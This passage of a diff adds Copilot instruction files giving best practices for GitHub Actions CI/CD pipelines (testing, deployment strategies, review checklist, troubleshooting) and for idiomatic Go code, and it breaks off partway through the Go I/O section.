- Advise on strategies to minimize E2E test flakiness, such as robust element selection and retry mechanisms.
|
||||
|
||||
### **4. Performance and Load Testing**
|
||||
|
||||
- **Principle:** Assess application performance and behavior under anticipated and peak load conditions to identify bottlenecks, ensure scalability, and prevent regressions.
|
||||
- **Deeper Dive:**
|
||||
- **Tools:** JMeter, k6, Locust, Gatling, Artillery. Choose based on language, complexity, and specific needs.
|
||||
- **Integration:** Integrate into CI/CD for continuous performance regression detection. Run these tests less frequently than unit/integration tests (e.g., nightly, weekly, or on significant feature merges).
|
||||
- **Thresholds:** Define clear performance thresholds (e.g., response time, throughput, error rates) and fail builds if these are exceeded.
|
||||
- **Baseline Comparison:** Compare current performance metrics against established baselines to detect degradation.
|
||||
- **Guidance for Copilot:**
|
||||
- Suggest integrating performance and load testing into the CI pipeline for critical applications, providing examples for common tools.
|
||||
- Advise on setting performance baselines and failing the build if performance degrades beyond a set threshold.
|
||||
- Recommend running these tests in a dedicated environment that simulates production load patterns.
|
||||
- Guide on analyzing performance test results to pinpoint areas for optimization (e.g., database queries, API endpoints).
|
||||
|
||||
### **5. Test Reporting and Visibility**
|
||||
|
||||
- **Principle:** Make test results easily accessible, understandable, and visible to all stakeholders (developers, QA, product owners) to foster transparency and enable quick issue resolution.
|
||||
- **Deeper Dive:**
|
||||
- **GitHub Checks/Annotations:** Leverage these for inline feedback directly in pull requests, showing which tests passed/failed and providing links to detailed reports.
|
||||
- **Artifacts:** Upload comprehensive test reports (JUnit XML, HTML reports, code coverage reports, video recordings, screenshots) as artifacts for long-term storage and detailed inspection.
|
||||
- **Integration with Dashboards:** Push results to external dashboards or reporting tools (e.g., SonarQube, custom reporting tools, Allure Report, TestRail) for aggregated views and historical trends.
|
||||
- **Status Badges:** Use GitHub Actions status badges in your README to indicate the latest build/test status at a glance.
|
||||
- **Guidance for Copilot:**
|
||||
- Use actions that publish test results as annotations or checks on PRs for immediate feedback and easy debugging directly in the GitHub UI.
|
||||
- Upload detailed test reports (e.g., XML, HTML, JSON) as artifacts for later inspection and historical analysis, including negative results like error screenshots.
|
||||
- Advise on integrating with external reporting tools for a more comprehensive view of test execution trends and quality metrics.
|
||||
- Suggest adding workflow status badges to the README for quick visibility of CI/CD health.
|
||||
|
||||
## Advanced Deployment Strategies (Expanded)
|
||||
|
||||
### **1. Staging Environment Deployment**
|
||||
|
||||
- **Principle:** Deploy to a staging environment that closely mirrors production for comprehensive validation, user acceptance testing (UAT), and final checks before promotion to production.
|
||||
- **Deeper Dive:**
|
||||
- **Mirror Production:** Staging should closely mimic production in terms of infrastructure, data, configuration, and security. Any significant discrepancies can lead to issues in production.
|
||||
- **Automated Promotion:** Implement automated promotion from staging to production upon successful UAT and necessary manual approvals. This reduces human error and speeds up releases.
|
||||
- **Environment Protection:** Use environment protection rules in GitHub Actions to prevent accidental deployments, enforce manual approvals, and restrict which branches can deploy to staging.
|
||||
- **Data Refresh:** Regularly refresh staging data from production (anonymized if necessary) to ensure realistic testing scenarios.
|
||||
- **Guidance for Copilot:**
|
||||
- Create a dedicated `environment` for staging with approval rules, secret protection, and appropriate branch protection policies.
|
||||
- Design workflows to automatically deploy to staging on successful merges to specific development or release branches (e.g., `develop`, `release/*`).
|
||||
- Advise on ensuring the staging environment is as close to production as possible to maximize test fidelity.
|
||||
- Suggest implementing automated smoke tests and post-deployment validation on staging.
|
||||
|
||||
### **2. Production Environment Deployment**
|
||||
|
||||
- **Principle:** Deploy to production only after thorough validation, potentially multiple layers of manual approvals, and robust automated checks, prioritizing stability and zero-downtime.
|
||||
- **Deeper Dive:**
|
||||
- **Manual Approvals:** Critical for production deployments, often involving multiple team members, security sign-offs, or change management processes. GitHub Environments support this natively.
|
||||
- **Rollback Capabilities:** Essential for rapid recovery from unforeseen issues. Ensure a quick and reliable way to revert to the previous stable state.
|
||||
- **Observability During Deployment:** Monitor production closely *during* and *immediately after* deployment for any anomalies or performance degradation. Use dashboards, alerts, and tracing.
|
||||
- **Progressive Delivery:** Consider advanced techniques like blue/green, canary, or dark launching for safer rollouts.
|
||||
- **Emergency Deployments:** Have a separate, highly expedited pipeline for critical hotfixes that bypasses non-essential approvals but still maintains security checks.
|
||||
- **Guidance for Copilot:**
|
||||
- Create a dedicated `environment` for production with required reviewers, strict branch protections, and clear deployment windows.
|
||||
- Implement manual approval steps for production deployments, potentially integrating with external ITSM or change management systems.
|
||||
- Emphasize the importance of clear, well-tested rollback strategies and automated rollback procedures in case of deployment failures.
|
||||
- Advise on setting up comprehensive monitoring and alerting for production systems to detect and respond to issues immediately post-deployment.
|
||||
|
||||
### **3. Deployment Types (Beyond Basic Rolling Update)**
|
||||
|
||||
- **Rolling Update (Default for Deployments):** Gradually replaces instances of the old version with new ones. Good for most cases, especially stateless applications.
|
||||
- **Guidance:** Configure `maxSurge` (how many new instances can be created above the desired replica count) and `maxUnavailable` (how many old instances can be unavailable) for fine-grained control over rollout speed and availability.
|
||||
- **Blue/Green Deployment:** Deploy a new version (green) alongside the existing stable version (blue) in a separate environment, then switch traffic completely from blue to green.
|
||||
- **Guidance:** Suggest for critical applications requiring zero-downtime releases and easy rollback. Requires managing two identical environments and a traffic router (load balancer, Ingress controller, DNS).
|
||||
- **Benefits:** Instantaneous rollback by switching traffic back to the blue environment.
|
||||
- **Canary Deployment:** Gradually roll out new versions to a small subset of users (e.g., 5-10%) before a full rollout. Monitor performance and error rates for the canary group.
|
||||
- **Guidance:** Recommend for testing new features or changes with a controlled blast radius. Implement with Service Mesh (Istio, Linkerd) or Ingress controllers that support traffic splitting and metric-based analysis.
|
||||
- **Benefits:** Early detection of issues with minimal user impact.
|
||||
- **Dark Launch/Feature Flags:** Deploy new code but keep features hidden from users until toggled on for specific users/groups via feature flags.
|
||||
- **Guidance:** Advise for decoupling deployment from release, allowing continuous delivery without continuous exposure of new features. Use feature flag management systems (LaunchDarkly, Split.io, Unleash).
|
||||
- **Benefits:** Reduces deployment risk, enables A/B testing, and allows for staged rollouts.
|
||||
- **A/B Testing Deployments:** Deploy multiple versions of a feature concurrently to different user segments to compare their performance based on user behavior and business metrics.
|
||||
- **Guidance:** Suggest integrating with specialized A/B testing platforms or building custom logic using feature flags and analytics.
|
||||
|
||||
### **4. Rollback Strategies and Incident Response**
|
||||
|
||||
- **Principle:** Be able to quickly and safely revert to a previous stable version in case of issues, minimizing downtime and business impact. This requires proactive planning.
|
||||
- **Deeper Dive:**
|
||||
- **Automated Rollbacks:** Implement mechanisms to automatically trigger rollbacks based on monitoring alerts (e.g., sudden increase in errors, high latency) or failure of post-deployment health checks.
|
||||
- **Versioned Artifacts:** Ensure previous successful build artifacts, Docker images, or infrastructure states are readily available and easily deployable. This is crucial for fast recovery.
|
||||
- **Runbooks:** Document clear, concise, and executable rollback procedures for manual intervention when automation isn't sufficient or for complex scenarios. These should be regularly reviewed and tested.
|
||||
- **Post-Incident Review:** Conduct blameless post-incident reviews (PIRs) to understand the root cause of failures, identify lessons learned, and implement preventative measures to improve resilience and reduce MTTR.
|
||||
- **Communication Plan:** Have a clear communication plan for stakeholders during incidents and rollbacks.
|
||||
- **Guidance for Copilot:**
|
||||
- Instruct users to store previous successful build artifacts and images for quick recovery, ensuring they are versioned and easily retrievable.
|
||||
- Advise on implementing automated rollback steps in the pipeline, triggered by monitoring or health check failures, and providing examples.
|
||||
- Emphasize building applications with "undo" in mind, meaning changes should be easily reversible.
|
||||
- Suggest creating comprehensive runbooks for common incident scenarios, including step-by-step rollback instructions, and highlight their importance for MTTR.
|
||||
- Guide on setting up alerts that are specific and actionable enough to trigger an automatic or manual rollback.
|
||||
|
||||
## GitHub Actions Workflow Review Checklist (Comprehensive)
|
||||
|
||||
This checklist provides a granular set of criteria for reviewing GitHub Actions workflows to ensure they adhere to best practices for security, performance, and reliability.
|
||||
|
||||
- [ ] **General Structure and Design:**
|
||||
- Is the workflow `name` clear, descriptive, and unique?
|
||||
- Are `on` triggers appropriate for the workflow's purpose (e.g., `push`, `pull_request`, `workflow_dispatch`, `schedule`)? Are path/branch filters used effectively?
|
||||
- Is `concurrency` used for critical workflows or shared resources to prevent race conditions or resource exhaustion?
|
||||
- Are global `permissions` set to the principle of least privilege (`contents: read` by default), with specific overrides for jobs?
|
||||
- Are reusable workflows (`workflow_call`) leveraged for common patterns to reduce duplication and improve maintainability?
|
||||
- Is the workflow organized logically with meaningful job and step names?
|
||||
|
||||
- [ ] **Jobs and Steps Best Practices:**
|
||||
- Are jobs clearly named and represent distinct phases (e.g., `build`, `lint`, `test`, `deploy`)?
|
||||
- Are `needs` dependencies correctly defined between jobs to ensure proper execution order?
|
||||
- Are `outputs` used efficiently for inter-job and inter-workflow communication?
|
||||
- Are `if` conditions used effectively for conditional job/step execution (e.g., environment-specific deployments, branch-specific actions)?
|
||||
- Are all `uses` actions securely versioned (pinned to a full commit SHA or specific major version tag like `@v4`)? Avoid `main` or `latest` tags.
|
||||
- Are `run` commands efficient and clean (combined with `&&`, temporary files removed, multi-line scripts clearly formatted)?
|
||||
- Are environment variables (`env`) defined at the appropriate scope (workflow, job, step) and never hardcoded sensitive data?
|
||||
- Is `timeout-minutes` set for long-running jobs to prevent hung workflows?
|
||||
|
||||
- [ ] **Security Considerations:**
|
||||
- Are all sensitive data accessed exclusively via GitHub `secrets` context (`${{ secrets.MY_SECRET }}`)? Never hardcoded, never exposed in logs (even if masked).
|
||||
- Is OpenID Connect (OIDC) used for cloud authentication where possible, eliminating long-lived credentials?
|
||||
- Is `GITHUB_TOKEN` permission scope explicitly defined and limited to the minimum necessary access (`contents: read` as a baseline)?
|
||||
- Are Software Composition Analysis (SCA) tools (e.g., `dependency-review-action`, Snyk) integrated to scan for vulnerable dependencies?
|
||||
- Are Static Application Security Testing (SAST) tools (e.g., CodeQL, SonarQube) integrated to scan source code for vulnerabilities, with critical findings blocking builds?
|
||||
- Is secret scanning enabled for the repository and are pre-commit hooks suggested for local credential leak prevention?
|
||||
- Is there a strategy for container image signing (e.g., Notary, Cosign) and verification in deployment workflows if container images are used?
|
||||
- For self-hosted runners, are security hardening guidelines followed and network access restricted?
|
||||
|
||||
- [ ] **Optimization and Performance:**
|
||||
- Is caching (`actions/cache`) effectively used for package manager dependencies (`node_modules`, `pip` caches, Maven/Gradle caches) and build outputs?
|
||||
- Are cache `key` and `restore-keys` designed for optimal cache hit rates (e.g., using `hashFiles`)?
|
||||
- Is `strategy.matrix` used for parallelizing tests or builds across different environments, language versions, or OSs?
|
||||
- Is `fetch-depth: 1` used for `actions/checkout` where full Git history is not required?
|
||||
- Are artifacts (`actions/upload-artifact`, `actions/download-artifact`) used efficiently for transferring data between jobs/workflows rather than re-building or re-fetching?
|
||||
- Are large files managed with Git LFS and optimized for checkout if necessary?
|
||||
|
||||
- [ ] **Testing Strategy Integration:**
|
||||
- Are comprehensive unit tests configured with a dedicated job early in the pipeline?
|
||||
- Are integration tests defined, ideally leveraging `services` for dependencies, and run after unit tests?
|
||||
- Are End-to-End (E2E) tests included, preferably against a staging environment, with robust flakiness mitigation?
|
||||
- Are performance and load tests integrated for critical applications with defined thresholds?
|
||||
- Are all test reports (JUnit XML, HTML, coverage) collected, published as artifacts, and integrated into GitHub Checks/Annotations for clear visibility?
|
||||
- Is code coverage tracked and enforced with a minimum threshold?
|
||||
|
||||
- [ ] **Deployment Strategy and Reliability:**
|
||||
- Are staging and production deployments using GitHub `environment` rules with appropriate protections (manual approvals, required reviewers, branch restrictions)?
|
||||
- Are manual approval steps configured for sensitive production deployments?
|
||||
- Is a clear and well-tested rollback strategy in place and automated where possible (e.g., `kubectl rollout undo`, reverting to previous stable image)?
|
||||
- Are chosen deployment types (e.g., rolling, blue/green, canary, dark launch) appropriate for the application's criticality and risk tolerance?
|
||||
- Are post-deployment health checks and automated smoke tests implemented to validate successful deployment?
|
||||
- Is the workflow resilient to temporary failures (e.g., retries for flaky network operations)?
|
||||
|
||||
- [ ] **Observability and Monitoring:**
|
||||
- Is logging adequate for debugging workflow failures (using STDOUT/STDERR for application logs)?
|
||||
- Are relevant application and infrastructure metrics collected and exposed (e.g., Prometheus metrics)?
|
||||
- Are alerts configured for critical workflow failures, deployment issues, or application anomalies detected in production?
|
||||
- Is distributed tracing (e.g., OpenTelemetry, Jaeger) integrated for understanding request flows in microservices architectures?
|
||||
- Are artifact `retention-days` configured appropriately to manage storage and compliance?
|
||||
|
||||
## Troubleshooting Common GitHub Actions Issues (Deep Dive)
|
||||
|
||||
This section provides an expanded guide to diagnosing and resolving frequent problems encountered when working with GitHub Actions workflows.
|
||||
|
||||
### **1. Workflow Not Triggering or Jobs/Steps Skipping Unexpectedly**
|
||||
|
||||
- **Root Causes:** Mismatched `on` triggers, incorrect `paths` or `branches` filters, erroneous `if` conditions, or `concurrency` limitations.
|
||||
- **Actionable Steps:**
|
||||
- **Verify Triggers:**
|
||||
- Check the `on` block for exact match with the event that should trigger the workflow (e.g., `push`, `pull_request`, `workflow_dispatch`, `schedule`).
|
||||
- Ensure `branches`, `tags`, or `paths` filters are correctly defined and match the event context. Remember that `paths-ignore` and `branches-ignore` take precedence.
|
||||
- If using `workflow_dispatch`, verify the workflow file is in the default branch and any required `inputs` are provided correctly during manual trigger.
|
||||
- **Inspect `if` Conditions:**
|
||||
- Carefully review all `if` conditions at the workflow, job, and step levels. A single false condition can prevent execution.
|
||||
- Use `always()` on a debug step to print context variables (`${{ toJson(github) }}`, `${{ toJson(job) }}`, `${{ toJson(steps) }}`) to understand the exact state during evaluation.
|
||||
- Test complex `if` conditions in a simplified workflow.
|
||||
- **Check `concurrency`:**
|
||||
- If `concurrency` is defined, verify if a previous run is blocking a new one for the same group. Check the "Concurrency" tab in the workflow run.
|
||||
- **Branch Protection Rules:** Ensure no branch protection rules are preventing workflows from running on certain branches or requiring specific checks that haven't passed.
|
||||
|
||||
### **2. Permissions Errors (`Resource not accessible by integration`, `Permission denied`)**
|
||||
|
||||
- **Root Causes:** `GITHUB_TOKEN` lacking necessary permissions, incorrect environment secrets access, or insufficient permissions for external actions.
|
||||
- **Actionable Steps:**
|
||||
- **`GITHUB_TOKEN` Permissions:**
|
||||
- Review the `permissions` block at both the workflow and job levels. Default to `contents: read` globally and grant specific write permissions only where absolutely necessary (e.g., `pull-requests: write` for updating PR status, `packages: write` for publishing packages).
|
||||
- Understand the default permissions of `GITHUB_TOKEN` which are often too broad.
|
||||
- **Secret Access:**
|
||||
- Verify if secrets are correctly configured in the repository, organization, or environment settings.
|
||||
- Ensure the workflow/job has access to the specific environment if environment secrets are used. Check if any manual approvals are pending for the environment.
|
||||
- Confirm the secret name matches exactly (`secrets.MY_API_KEY`).
|
||||
- **OIDC Configuration:**
|
||||
- For OIDC-based cloud authentication, double-check the trust policy configuration in your cloud provider (AWS IAM roles, Azure AD app registrations, GCP service accounts) to ensure it correctly trusts GitHub's OIDC issuer.
|
||||
- Verify the role/identity assigned has the necessary permissions for the cloud resources being accessed.
|
||||
|
||||
### **3. Caching Issues (`Cache not found`, `Cache miss`, `Cache creation failed`)**
|
||||
|
||||
- **Root Causes:** Incorrect cache key logic, `path` mismatch, cache size limits, or frequent cache invalidation.
|
||||
- **Actionable Steps:**
|
||||
- **Validate Cache Keys:**
|
||||
- Verify `key` and `restore-keys` are correct and dynamically change only when dependencies truly change (e.g., `key: ${{ runner.os }}-node-${{ hashFiles('**/package-lock.json') }}`). A cache key that is too dynamic will always result in a miss.
|
||||
- Use `restore-keys` to provide fallbacks for slight variations, increasing cache hit chances.
|
||||
- **Check `path`:**
|
||||
- Ensure the `path` specified in `actions/cache` for saving and restoring corresponds exactly to the directory where dependencies are installed or artifacts are generated.
|
||||
- Verify the existence of the `path` before caching.
|
||||
- **Debug Cache Behavior:**
|
||||
- Use the `actions/cache/restore` action with `lookup-only: true` to inspect what keys are being tried and why a cache miss occurred without affecting the build.
|
||||
- Review workflow logs for `Cache hit` or `Cache miss` messages and associated keys.
|
||||
- **Cache Size and Limits:** Be aware of GitHub Actions cache size limits per repository. If caches are very large, they might be evicted frequently.
|
||||
|
||||
### **4. Long Running Workflows or Timeouts**
|
||||
|
||||
- **Root Causes:** Inefficient steps, lack of parallelism, large dependencies, unoptimized Docker image builds, or resource bottlenecks on runners.
|
||||
- **Actionable Steps:**
|
||||
- **Profile Execution Times:**
|
||||
- Use the workflow run summary to identify the longest-running jobs and steps. This is your primary tool for optimization.
|
||||
- **Optimize Steps:**
|
||||
- Combine `run` commands with `&&` to reduce layer creation and overhead in Docker builds.
|
||||
- Clean up temporary files immediately after use (`rm -rf` in the same `RUN` command).
|
||||
- Install only necessary dependencies.
|
||||
- **Leverage Caching:**
|
||||
- Ensure `actions/cache` is optimally configured for all significant dependencies and build outputs.
|
||||
- **Parallelize with Matrix Strategies:**
|
||||
- Break down tests or builds into smaller, parallelizable units using `strategy.matrix` to run them concurrently.
|
||||
- **Choose Appropriate Runners:**
|
||||
- Review `runs-on`. For very resource-intensive tasks, consider using larger GitHub-hosted runners (if available) or self-hosted runners with more powerful specs.
|
||||
- **Break Down Workflows:**
|
||||
- For very complex or long workflows, consider breaking them into smaller, independent workflows that trigger each other or use reusable workflows.
|
||||
|
||||
### **5. Flaky Tests in CI (`Random failures`, `Passes locally, fails in CI`)**
|
||||
|
||||
- **Root Causes:** Non-deterministic tests, race conditions, environmental inconsistencies between local and CI, reliance on external services, or poor test isolation.
|
||||
- **Actionable Steps:**
|
||||
- **Ensure Test Isolation:**
|
||||
- Make sure each test is independent and doesn't rely on the state left by previous tests. Clean up resources (e.g., database entries) after each test or test suite.
|
||||
- **Eliminate Race Conditions:**
|
||||
- For integration/E2E tests, use explicit waits (e.g., wait for element to be visible, wait for API response) instead of arbitrary `sleep` commands.
|
||||
- Implement retries for operations that interact with external services or have transient failures.
|
||||
- **Standardize Environments:**
|
||||
- Ensure the CI environment (Node.js version, Python packages, database versions) matches the local development environment as closely as possible.
|
||||
- Use Docker `services` for consistent test dependencies.
|
||||
- **Robust Selectors (E2E):**
|
||||
- Use stable, unique selectors in E2E tests (e.g., `data-testid` attributes) instead of brittle CSS classes or XPath.
|
||||
- **Debugging Tools:**
|
||||
- Configure E2E test frameworks to capture screenshots and video recordings on test failure in CI to visually diagnose issues.
|
||||
- **Run Flaky Tests in Isolation:**
|
||||
- If a test is consistently flaky, isolate it and run it repeatedly to identify the underlying non-deterministic behavior.
|
||||
|
||||
### **6. Deployment Failures (Application Not Working After Deploy)**
|
||||
|
||||
- **Root Causes:** Configuration drift, environmental differences, missing runtime dependencies, application errors, or network issues post-deployment.
|
||||
- **Actionable Steps:**
|
||||
- **Thorough Log Review:**
|
||||
- Review deployment logs (`kubectl logs`, application logs, server logs) for any error messages, warnings, or unexpected output during the deployment process and immediately after.
|
||||
- **Configuration Validation:**
|
||||
- Verify environment variables, ConfigMaps, Secrets, and other configuration injected into the deployed application. Ensure they match the target environment's requirements and are not missing or malformed.
|
||||
- Use pre-deployment checks to validate configuration.
|
||||
- **Dependency Check:**
|
||||
- Confirm all application runtime dependencies (libraries, frameworks, external services) are correctly bundled within the container image or installed in the target environment.
|
||||
- **Post-Deployment Health Checks:**
|
||||
- Implement robust automated smoke tests and health checks *after* deployment to immediately validate core functionality and connectivity. Trigger rollbacks if these fail.
|
||||
- **Network Connectivity:**
|
||||
- Check network connectivity between deployed components (e.g., application to database, service to service) within the new environment. Review firewall rules, security groups, and Kubernetes network policies.
|
||||
- **Rollback Immediately:**
|
||||
- If a production deployment fails or causes degradation, trigger the rollback strategy immediately to restore service. Diagnose the issue in a non-production environment.
|
||||
|
||||
## Conclusion
|
||||
|
||||
GitHub Actions is a powerful and flexible platform for automating your software development lifecycle. By rigorously applying these best practices—from securing your secrets and token permissions, to optimizing performance with caching and parallelization, and implementing comprehensive testing and robust deployment strategies—you can guide developers in building highly efficient, secure, and reliable CI/CD pipelines. Remember that CI/CD is an iterative journey; continuously measure, optimize, and secure your pipelines to achieve faster, safer, and more confident releases. Your detailed guidance will empower teams to leverage GitHub Actions to its fullest potential and deliver high-quality software with confidence. This extensive document serves as a foundational resource for anyone looking to master CI/CD with GitHub Actions.
|
||||
|
||||
---
|
||||
|
||||
<!-- End of GitHub Actions CI/CD Best Practices Instructions -->
|
||||
@@ -0,0 +1,350 @@
|
||||
---
|
||||
description: 'Instructions for writing Go code following idiomatic Go practices and community standards'
|
||||
applyTo: '**/*.go,**/go.mod,**/go.sum'
|
||||
---
|
||||
|
||||
# Go Development Instructions
|
||||
|
||||
Follow idiomatic Go practices and community standards when writing Go code.
|
||||
These instructions are based on:
|
||||
|
||||
- [Effective Go](https://go.dev/doc/effective_go)
|
||||
- [Go Code Review Comments](https://go.dev/wiki/CodeReviewComments)
|
||||
- [Uber's Go Style Guide](https://github.com/uber-go/guide)
|
||||
- [Google's Go Style Guide](https://google.github.io/styleguide/go/)
|
||||
|
||||
## General Instructions
|
||||
|
||||
- Write simple, clear, and idiomatic Go code
|
||||
- Favor clarity and simplicity over cleverness
|
||||
- Follow the principle of least surprise
|
||||
- Keep the happy path left-aligned (minimize indentation)
|
||||
- Return early to reduce nesting
|
||||
- Prefer early return over if-else chains; use `if condition { return }` pattern to avoid else blocks
|
||||
- Make the zero value useful
|
||||
- Write self-documenting code with clear, descriptive names
|
||||
- Document exported types, functions, methods, and packages
|
||||
- Use Go modules for dependency management
|
||||
- Leverage the Go standard library instead of reinventing the wheel (e.g., use `strings.Builder` for string concatenation, `filepath.Join` for path construction)
|
||||
- Prefer standard library solutions over custom implementations when functionality exists
|
||||
- Write comments in English by default; translate only upon user request
|
||||
- Avoid using emoji in code and comments
|
||||
|
||||
## Naming Conventions
|
||||
|
||||
### Packages
|
||||
|
||||
- Use lowercase, single-word package names
|
||||
- Avoid underscores, hyphens, or mixedCaps
|
||||
- Choose names that describe what the package provides, not what it contains
|
||||
- Avoid generic names like `util`, `common`, or `base`
|
||||
- Package names should be singular, not plural
|
||||
|
||||
#### Package Declaration Rules (CRITICAL):
|
||||
|
||||
- **NEVER duplicate `package` declarations** - each Go file must have exactly ONE `package` line
|
||||
- When editing an existing `.go` file:
|
||||
- **PRESERVE** the existing `package` declaration - do not add another one
|
||||
- If you need to replace the entire file content, start with the existing package name
|
||||
- When creating a new `.go` file:
|
||||
- **BEFORE writing any code**, check what package name other `.go` files in the same directory use
|
||||
- Use the SAME package name as existing files in that directory
|
||||
- If it's a new directory, use the directory name as the package name
|
||||
- Write **exactly one** `package <name>` line at the very top of the file
|
||||
- When using file creation or replacement tools:
|
||||
- **ALWAYS verify** the target file doesn't already have a `package` declaration before adding one
|
||||
- If replacing file content, include only ONE `package` declaration in the new content
|
||||
- **NEVER** create files with multiple `package` lines or duplicate declarations
|
||||
|
||||
### Variables and Functions
|
||||
|
||||
- Use mixedCaps or MixedCaps (camelCase) rather than underscores
|
||||
- Keep names short but descriptive
|
||||
- Use single-letter variables only for very short scopes (like loop indices)
|
||||
- Exported names start with a capital letter
|
||||
- Unexported names start with a lowercase letter
|
||||
- Avoid stuttering (e.g., avoid `http.HTTPServer`, prefer `http.Server`)
|
||||
|
||||
### Interfaces
|
||||
|
||||
- Name interfaces with -er suffix when possible (e.g., `Reader`, `Writer`, `Formatter`)
|
||||
- Single-method interfaces should be named after the method (e.g., `Read` → `Reader`)
|
||||
- Keep interfaces small and focused
|
||||
|
||||
### Constants
|
||||
|
||||
- Use MixedCaps for exported constants
|
||||
- Use mixedCaps for unexported constants
|
||||
- Group related constants using `const` blocks
|
||||
- Consider using typed constants for better type safety
|
||||
|
||||
## Code Style and Formatting
|
||||
|
||||
### Formatting
|
||||
|
||||
- Always use `gofmt` to format code
|
||||
- Use `goimports` to manage imports automatically
|
||||
- Keep line length reasonable (no hard limit, but consider readability)
|
||||
- Add blank lines to separate logical groups of code
|
||||
|
||||
### Comments
|
||||
|
||||
- Strive for self-documenting code; prefer clear variable names, function names, and code structure over comments
|
||||
- Write comments only when necessary to explain complex logic, business rules, or non-obvious behavior
|
||||
- Write comments in complete sentences in English by default
|
||||
- Translate comments to other languages only upon specific user request
|
||||
- Start sentences with the name of the thing being described
|
||||
- Package comments should start with "Package [name]"
|
||||
- Use line comments (`//`) for most comments
|
||||
- Use block comments (`/* */`) sparingly, mainly for package documentation
|
||||
- Document why, not what, unless the what is complex
|
||||
- Avoid emoji in comments and code
|
||||
|
||||
### Error Handling
|
||||
|
||||
- Check errors immediately after the function call
|
||||
- Don't ignore errors using `_` unless you have a good reason (document why)
|
||||
- Wrap errors with context using `fmt.Errorf` with `%w` verb
|
||||
- Create custom error types when you need to check for specific errors
|
||||
- Place error returns as the last return value
|
||||
- Name error variables `err`
|
||||
- Keep error messages lowercase and don't end with punctuation
|
||||
|
||||
## Architecture and Project Structure
|
||||
|
||||
### Package Organization
|
||||
|
||||
- Follow standard Go project layout conventions
|
||||
- Keep `main` packages in `cmd/` directory
|
||||
- Put reusable packages in `pkg/` or `internal/`
|
||||
- Use `internal/` for packages that shouldn't be imported by external projects
|
||||
- Group related functionality into packages
|
||||
- Avoid circular dependencies
|
||||
|
||||
### Dependency Management
|
||||
|
||||
- Use Go modules (`go.mod` and `go.sum`)
|
||||
- Keep dependencies minimal
|
||||
- Regularly update dependencies for security patches
|
||||
- Use `go mod tidy` to clean up unused dependencies
|
||||
- Vendor dependencies only when necessary
|
||||
|
||||
## Type Safety and Language Features
|
||||
|
||||
### Type Definitions
|
||||
|
||||
- Define types to add meaning and type safety
|
||||
- Use struct tags for JSON, XML, database mappings
|
||||
- Prefer explicit type conversions
|
||||
- Use type assertions carefully and check the second return value
|
||||
- Prefer generics over unconstrained types; when an unconstrained type is truly needed, use the predeclared alias `any` instead of `interface{}`
|
||||
|
||||
### Pointers vs Values
|
||||
|
||||
- Use pointer receivers for large structs or when you need to modify the receiver
|
||||
- Use value receivers for small structs and when immutability is desired
|
||||
- Use pointer parameters when you need to modify the argument or for large structs
|
||||
- Use value parameters for small structs and when you want to prevent modification
|
||||
- Be consistent within a type's method set
|
||||
- Consider the zero value when choosing pointer vs value receivers
|
||||
|
||||
### Interfaces and Composition
|
||||
|
||||
- Accept interfaces, return concrete types
|
||||
- Keep interfaces small (1-3 methods is ideal)
|
||||
- Use embedding for composition
|
||||
- Define interfaces close to where they're used, not where they're implemented
|
||||
- Don't export interfaces unless necessary
|
||||
|
||||
## Concurrency
|
||||
|
||||
### Goroutines
|
||||
|
||||
- Be cautious about creating goroutines in libraries; prefer letting the caller control concurrency
|
||||
- If you must create goroutines in libraries, provide clear documentation and cleanup mechanisms
|
||||
- Always know how a goroutine will exit
|
||||
- Use `sync.WaitGroup` or channels to wait for goroutines
|
||||
- Avoid goroutine leaks by ensuring cleanup
|
||||
|
||||
### Channels
|
||||
|
||||
- Use channels to communicate between goroutines
|
||||
- Don't communicate by sharing memory; share memory by communicating
|
||||
- Close channels from the sender side, not the receiver
|
||||
- Use buffered channels when you know the capacity
|
||||
- Use `select` for non-blocking operations
|
||||
|
||||
### Synchronization
|
||||
|
||||
- Use `sync.Mutex` for protecting shared state
|
||||
- Keep critical sections small
|
||||
- Use `sync.RWMutex` when you have many readers
|
||||
- Choose between channels and mutexes based on the use case: use channels for communication, mutexes for protecting state
|
||||
- Use `sync.Once` for one-time initialization
|
||||
- WaitGroup usage by Go version:
|
||||
- If `go >= 1.25` in `go.mod`, use the new `WaitGroup.Go` method ([documentation](https://pkg.go.dev/sync#WaitGroup)):
|
||||
```go
|
||||
var wg sync.WaitGroup
|
||||
wg.Go(task1)
|
||||
wg.Go(task2)
|
||||
wg.Wait()
|
||||
```
|
||||
- If `go < 1.25`, use the classic `Add`/`Done` pattern
|
||||
|
||||
## Error Handling Patterns
|
||||
|
||||
### Creating Errors
|
||||
|
||||
- Use `errors.New` for simple static errors
|
||||
- Use `fmt.Errorf` for dynamic errors
|
||||
- Create custom error types for domain-specific errors
|
||||
- Export error variables for sentinel errors
|
||||
- Use `errors.Is` and `errors.As` for error checking
|
||||
|
||||
### Error Propagation
|
||||
|
||||
- Add context when propagating errors up the stack
|
||||
- Don't log and return errors (choose one)
|
||||
- Handle errors at the appropriate level
|
||||
- Consider using structured errors for better debugging
|
||||
|
||||
## Performance Optimization
|
||||
|
||||
### Memory Management
|
||||
|
||||
- Minimize allocations in hot paths
|
||||
- Reuse objects when possible (consider `sync.Pool`)
|
||||
- Use value receivers for small structs
|
||||
- Preallocate slices when size is known
|
||||
- Avoid unnecessary string conversions
|
||||
|
||||
### I/O: Readers and Buffers
|
||||
|
||||
- Most `io.Reader` streams are consumable once; reading advances state. Do not assume a reader can be re-read without special handling
|
||||
- If you must read data multiple times, buffer it once and recreate readers on demand:
|
||||
- Use `io.ReadAll` (or a limited read) to obtain `[]byte`, then create fresh readers via `bytes.NewReader(buf)` or `bytes.NewBuffer(buf)` for each reuse
|
||||
- For strings, use `strings.NewReader(s)`; you can `Seek(0, io.SeekStart)` on `*bytes.Reader` to rewind
|
||||
- For HTTP requests, do not reuse a consumed `req.Body`. Instead:
|
||||
- Keep the original payload as `[]byte` and set `req.Body = io.NopCloser(bytes.NewReader(buf))` before each send
|
||||
- Prefer configuring `req.GetBody` so the transport can recreate the body for redirects/retries: `req.GetBody = func() (io.ReadCloser, error) { return io.NopCloser(bytes.NewReader(buf)), nil }`
|
||||
- To duplicate a stream while reading, use `io.TeeReader` (copy to a buffer while passing through) or write to multiple sinks with `io.MultiWriter`
|
||||
- Reusing buffered readers: call `(*bufio.Reader).Reset(r)` to attach to a new underlying reader; do not expect it to “rewind” unless the source supports seeking
|
||||
- For large payloads, avoid unbounded buffering; consider streaming, `io.LimitReader`, or on-disk temporary storage to control memory
|
||||
|
||||
- Use `io.Pipe` to stream without buffering the whole payload:
|
||||
- Write to `*io.PipeWriter` in a separate goroutine while the reader consumes
|
||||
